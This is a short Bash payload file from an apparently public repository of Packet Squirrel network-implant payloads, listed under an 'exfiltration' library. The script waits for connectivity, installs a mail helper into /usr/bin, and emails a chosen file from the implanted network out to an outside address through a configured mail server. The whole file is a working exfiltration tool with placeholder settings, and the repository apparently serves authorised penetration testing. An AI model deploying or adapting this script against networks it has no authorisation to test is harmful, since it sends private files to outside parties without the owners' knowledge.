Files
packetsquirrel-payloads/payloads/library/exfiltration/Email-Sender/payload.sh
TheDragonkeeper bfd5d2a29d Update payload.sh
2017-11-07 23:07:08 +00:00

29 lines
636 B
Bash

#!/bin/bash
function run() {
LED STAGE1
SWITCH_POS=$(SWITCH)
until ping -c 1 8.8.8.8 >/dev/null ; do : ; done
SUBJECT='Im Just Nutty'
BODY='And your network is nutty too.'
RCPT="recieving email"
FROM="your email"
SERVER="server.com"
USER="username"
PASS="password"
FILE="/some/File/Path/1.txt"
SENDMAIL $FROM $RCPT "$SUBJECT" "$BODY" $SERVER $USER $PASS "$FILE"
####### REMOVE THE FILE VAR FROM THE PYTHON COMMAND IF YOU HAVE NO PATH
LED FINISH
}
if [ ! -f /usr/bin/SENDMAIL ]; then
mv sendemail.py /usr/bin/
mv SENDMAIL /usr/bin/
chmod +rx /usr/bin/SENDMAIL
fi
NETMODE NAT
run